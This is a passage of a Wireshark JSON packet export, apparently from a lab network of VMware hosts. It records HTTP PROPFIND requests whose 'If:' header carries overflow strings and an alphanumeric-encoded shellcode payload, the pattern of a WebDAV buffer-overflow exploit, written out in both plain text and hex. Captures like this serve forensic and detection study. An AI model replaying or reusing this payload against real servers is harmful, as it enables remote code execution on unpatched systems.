"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "295",
|
||
"ip.id": "0x00002736",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000934",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "33417",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "33417",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "56",
|
||
"tcp.len": "243",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3402508514",
|
||
"tcp.nxtseq": "1692",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "2845213026",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000831c",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:3b:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:3b:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868603",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000426000",
|
||
"tcp.analysis.bytes_in_flight": "1691",
|
||
"tcp.analysis.push_bytes_sent": "1691"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000702000",
|
||
"tcp.time_delta": "0.000044000"
|
||
},
|
||
"tcp.payload": "70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "342",
|
||
"tcp.segment": "343",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1691",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:6f:4b:6e:59:4a:59:61:54:77:55:70:51:57:6c:48:43:6e:65:54:79:4f:6f:44:59:6f:6f:45:46:6f:47:64:4d:63:44:62:53:48:46:5a:5a:42:76:77:63:41:48:70:53:65:77:76:6a:75:71:64:44:61:48:4c:73:44:62:52:61:70:50:4b:6e:65:66:79:4a:4e:45:4a:70:61:42:67:49:48:52:66:43:6a:71:78:64:62:6f:e7:99:a5:e6:95:8a:e7:89:b9:e6:a5:90:e7:81:89:e7:99:ad:e4:9d:94:e7:9d:ba:e4:b9:a5:e4:85:a9:e5:91:84:e4:89:96:e4:91:aa:e4:99:b1:e7:91:99:e4:99:88:c8:82:c8:82:e1:8b:80:e6:a0:83:e5:95:af:e6:bd:81:e5:9d:83:e7:8d:b8:e5:91:82:e6:bd:a3:e4:b1:83:e7:81:95:e4:a9:85:e6:8d:92:e7:85:9a:e7:8d:90:e5:99:ba:e6:b5:86:e4:a5:ba:e6:91:b8:e7:95:88:e7:a9:81:e5:89:ad:e5:9d:ba:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:70:5a:6e:45:6a:6e:6b:59:78:4b:4f:59:52:62:4c:63:66:41:51:65:6d:74:49:79:69:73:75:6c:49:43:43:6f:58:76:47:6e:62:4e:66:50:69:67:6f:76:50:70:4b:42:64:55:4e:6f:78:55:42:52:4c:4f:6b:55:47:73:65:52:44:73:42:6c:53:76:41:6e:51:6b:71:4e:7a:43:68:4f:55:75:6e:4f:52:43:70:69:77:62:e7:81:a4:e4:b9:aa:e5:91:ab:e7:9d:a6:e7:95:a4:e5:8d:b5:e7:91:a2:e6:b1:ae:e4:a9:b4:e7:9d:af:e6:b9:8f:e6:bd:96:e4:bd:a2:e4:a5:b4:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:a1:88:e7:a5:b9:e4:a9:81:e4:b9:b8:e1:8f:80:e6:a0:83:e4:a5:a3:e7:91:ad:e6:89:94:e6:a5:ae:e6:bd:95:e5:99:ab:e5:95:8a:e4:bd:81:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/oKnYJYaTwUpQWlHCneTyOoDYooEFoGdMcDbSHFZZBvwcAHpSewvjuqdDaHLsDbRapPKnefyJNEJpaBgIHRfCjqxdbo<62><6F><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/pZnEjnkYxKOYRbLcfAQemtIyisulICCoXvGnbNfPigovPpKBdUNoxUBRLOkUGseRDsBlSvAnQkqNzChOUunORCpiwb<77><62><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "345"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.800652000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.800652000",
|
||
"frame.time_delta": "0.000006000",
|
||
"frame.time_delta_displayed": "0.004694000",
|
||
"frame.time_relative": "17.051592000",
|
||
"frame.number": "352",
|
||
"frame.len": "307",
|
||
"frame.cap_len": "307",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "293",
|
||
"ip.id": "0x0000fa55",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00003616",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "40489",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "40489",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "57",
|
||
"tcp.len": "241",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "106351541",
|
||
"tcp.nxtseq": "1690",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "1677159243",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00005525",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cc:40:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cc:40:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868608",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000461000",
|
||
"tcp.analysis.bytes_in_flight": "1689",
|
||
"tcp.analysis.push_bytes_sent": "1689"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000728000",
|
||
"tcp.time_delta": "0.000006000"
|
||
},
|
||
"tcp.payload": "42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
